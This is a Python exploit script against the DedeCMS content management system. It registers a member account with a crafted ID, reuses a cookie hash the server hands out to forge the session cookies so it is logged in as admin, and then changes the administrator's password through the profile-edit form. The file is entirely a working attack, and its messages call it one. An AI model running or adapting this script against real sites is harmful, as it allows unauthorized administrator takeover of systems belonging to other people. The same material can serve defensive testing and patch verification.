# coding=utf-8

import requests
import re

if __name__ == "__main__":
    dede_host = "http://127.0.0.1/"
    oldpwd = '123456'
    newpwd = "cnvdcnvd"
    s = requests.Session()

    if '系统关闭了会员功能' in requests.get(dede_host + 'member/reg_new.php').content:
        exit('The system has closed the member function .Can not attack !!!')
    else:
        print "The system opened the membership function, I wish you good luck  !!"

    headers = {"Referer": dede_host + "member/reg_new.php"}
    rs = s.get(dede_host + 'include/vdimgck.php').content
    file = open('1.jpg', "wb")
    file.write(rs)
    file.close()

    vdcode = raw_input("Please enter the registration verification code : ")

    userid = '0000001'
    uname = '0000001'
    userpwd = '123456'


    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0)",
               "Content-Type": "application/x-www-form-urlencoded"}
    data = "dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwd}&email=0000001%400000001.com&safequestion=0&safeanswer=&sex=%E7%94%B7&vdcode={vdcode}&agree=".format(
        userid=userid, uname=uname, userpwd=userpwd, vdcode=vdcode)
    rs = s.post(dede_host + '/member/reg_new.php', data=data, headers=headers)
    if "验证码错误" in rs.content:
        exit("Verification code error, account registration failed")
    elif '注册成功' in rs.content:
        print 'registration success !!'

    rs = s.get(dede_host + "/member/index.php?uid={userid}".format(userid=userid))
    if "资料尚未通过审核" in rs.content:
        exit("User information has not been approved !!!")  # 会员使用权限开通状态(-10 邮件验证 -1 手工审核, 0 没限制):
    searchObj = re.search(r'last_vid__ckMd5=(.*?);', rs.headers['Set-Cookie'], re.M | re.I)
    last_vid__ckMd5 = searchObj.group(1)
    s.cookies['DedeUserID'] = userid
    s.cookies['DedeUserID__ckMd5'] = last_vid__ckMd5
    rs = s.get(dede_host + "/member/index.php")
    if "class=\"userName\">admin</a>" in rs.text:
        print "Administrator login successful !!"

    headers = {"Referer": dede_host + "member/edit_baseinfo.php"}
    rs = s.get(dede_host + 'include/vdimgck.php').content
    file = open('2.jpg', "wb")
    file.write(rs)
    file.close()

    vdcode = raw_input("Please enter the verification code : ")

    data = {"dopost": "save", "uname": "admin", "oldpwd": oldpwd, "userpwd": newpwd, "userpwdok": newpwd,
            "safequestion": "0", "newsafequestion": "0", "sex": "男", "email": "admin@admin.com", "vdcode": vdcode}
    rs = s.post(dede_host + '/member/edit_baseinfo.php', data=data)
    if "成功更新你的基本资料" in  rs.content:
       print "Administrator password modified successfully !!"
       print "The new administrator password is : " + newpwd
    else:
        print "attack fail"